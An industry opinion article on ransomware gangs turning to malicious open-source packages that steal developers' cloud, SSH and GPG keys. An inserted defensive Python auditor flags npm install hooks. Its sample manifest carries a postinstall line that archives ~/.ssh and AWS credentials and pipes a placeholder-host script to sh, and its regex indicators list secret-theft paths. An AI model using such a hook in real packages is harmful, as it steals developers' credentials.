Ransomware Attackers Are Being Drawn To The Open-Source Ecosystem

By Pete Morgan, co-founder and CSO at Phylum

Ransomware continues to be a significant problem for companies worldwide. If you’re not entirely convinced, ask a non-techie if they’ve heard of ransomware, and you’ll likely at least get an affirmative nod.

When discussing ransomware, I always like to preface it with the following: ransomware is not an attack but rather an evolutionary step in monetizing the compromise of computers. Attackers used to steal payment card data and sell it to other attackers for use in carding schemes. Cryptocurrency, and the ease with which an individual can buy it, has made direct payment and the obfuscation of payment data more accessible to attackers. Attackers have long had a myriad of methods to compromise computers; still, the most effective way to turn those compromises into money is disabling access to systems and/or data by encrypting the most valuable assets and discarding the originals.

Chainalysis reported that ransomware attackers extorted an estimated $456.8 million from victims in 2022, down from $765.6 million the year before. This seemed like good news for security teams and could be seen as validation that the training, endpoint tools, and policies they put in place are working. But that is only half true. Ransomware is a business so effective that it has grown to offer services to other attackers in a service provider model. And just as in any other business experiencing a loss of revenue, the loss only serves as motivation to adapt. Reduced revenue from existing attacks will not stop attackers from ransoming businesses; it will only change the tactics they use to conduct operations.

The last few months have seen record numbers of compromises ending in ransomware. Given the amount of money attackers are extracting from companies using these techniques, I think it’s safe to say ransomware isn’t going anywhere anytime soon. One area ripe for such attacks is software developer workstations. These workstations are less commonly protected by endpoint defensive technology because the process of software development often triggers false positives in endpoint agents and drastically slows down the productivity of the developers in question. In addition, developers often have significantly more access to valuable resources than other types of employees, and the massive shift to remote work has made them even higher-value targets.

We have already begun to see malware authors include well-known ransomware binaries in their open-source package publications. The methods have been primitive so far, following a familiar publish-and-iterate pattern designed to refine their techniques and increase their sophistication as they learn how vulnerable developers are and which assets they can reach. Attackers will quickly adapt beyond simply re-packaging existing ransomware binaries, developing harder-to-detect payloads in non-compiled languages to increase their effectiveness and evade traditional detection methods. Combined with supply chain attacks such as dependency confusion, this will let attackers target victims with precision.

The open-source ecosystem is an enticing entry point for ransomware attackers both because it offers high-value data for lateral movement and because it is not well-defended. For example, instead of simply encrypting files, attackers can use malicious packages to access developer workstations containing secrets such as AWS, SSH and GPG keys, code-signing keys, and access to source code. These secrets can then be used to mount much more damaging ransomware attacks. Using AWS keys, attackers can often alter or delete backups stored in the AWS cloud, making ransomware attacks much more effective. SSH keys are often used to authenticate users to other computers; attackers who obtain them can move laterally through a compromised organization, learning both which defenses to evade and which targets to disable with a ransomware payload.
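One defensive check that follows from the above, added here as an example and not code from the article or from Phylum: an audit of an npm package.json that looks at the install-time lifecycle scripts (the hooks npm runs automatically, so a malicious package needs no import from the victim's code) for references to the secret stores the article names (AWS, SSH, GPG keys) or for download-and-execute idioms. The indicator patterns, the scoring rule and the two sample manifests are constructed for illustration and are not drawn from any real package.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator set for this example. Path patterns cover the secret
# stores a developer workstation typically holds; the remaining patterns are
# common download-and-execute and payload-decoding idioms.
INDICATORS = {
    "aws_credentials": re.compile(r"\.aws[/\\]credentials|AWS_SECRET_ACCESS_KEY"),
    "ssh_keys": re.compile(r"\.ssh[/\\]|id_(rsa|ed25519|ecdsa)"),
    "gpg_keys": re.compile(r"\.gnupg[/\\]|gpg\s+--export-secret"),
    "remote_fetch_exec": re.compile(r"(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "encoded_payload": re.compile(r"base64\s+(-d|--decode)|eval\("),
    "npm_token": re.compile(r"\.npmrc|NPM_TOKEN"),
}


def audit_manifest(manifest_text: str) -> list[dict]:
    """Return one finding per (hook, indicator) match in a package.json text."""
    manifest = json.loads(manifest_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(command):
                findings.append({
                    "package": manifest.get("name", "<unnamed>"),
                    "hook": hook,
                    "indicator": name,
                    "command": command,
                })
    return findings


def risk_score(findings: list[dict]) -> int:
    """Crude score: number of distinct indicator classes hit, with a bonus
    when secret-store access and remote execution appear together, since
    that combination is the exfiltration pattern the article describes."""
    classes = {f["indicator"] for f in findings}
    score = len(classes)
    secret_stores = {"aws_credentials", "ssh_keys", "gpg_keys"}
    if "remote_fetch_exec" in classes and classes & secret_stores:
        score += 2
    return score


# Constructed sample manifests; the hostname is a deliberate placeholder.
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "example-suspicious-pkg",
    "version": "0.0.1",
    "scripts": {
        "postinstall": "tar czf /tmp/k.tgz ~/.ssh/ ~/.aws/credentials "
                       "&& curl -s http://placeholder.invalid/d.sh | sh",
        "test": "jest",
    },
})

BENIGN_MANIFEST = json.dumps({
    "name": "example-benign-pkg",
    "version": "1.2.3",
    "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"},
})

if __name__ == "__main__":
    for text in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        found = audit_manifest(text)
        print(json.loads(text)["name"], "risk score:", risk_score(found))
        for finding in found:
            print("  ", finding["hook"], "->", finding["indicator"])
```

Run against a vendored node_modules tree or a registry mirror, this is the kind of pre-install gate that catches the primitive first iterations the article mentions; the regular expressions are intentionally simple and will need tuning to the false-positive rate of a real build pipeline.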

These TTPs have made it difficult to connect existing software supply chain attacks with ransomware outcomes. Attackers who successfully exfiltrate AWS or SSH keys will logically use that access to study their victim for days, weeks or months before mounting further operations. This separation between access-gaining operations and outcomes such as ransomware makes it challenging for defenders to reconstruct the attack chain. It is always easier to point at phishing or unpatched vulnerabilities in modern, complex computer networks.

While organizations may have made progress in preventing traditional social engineering techniques, make no mistake: ransomware attacks are not going anywhere. They are just finding new ways to get in, and most organizations won’t see it coming.

Author Bio

Peter is a security researcher with a long history in research and consulting organizations tied to some of the smartest people imaginable.

He is proud to have helped build a team composed of software developers and vulnerability researchers with over a decade of experience.

This background enabled Phylum to develop a truly next-generation product to protect our customers from the growing number of attacks against open-source software.
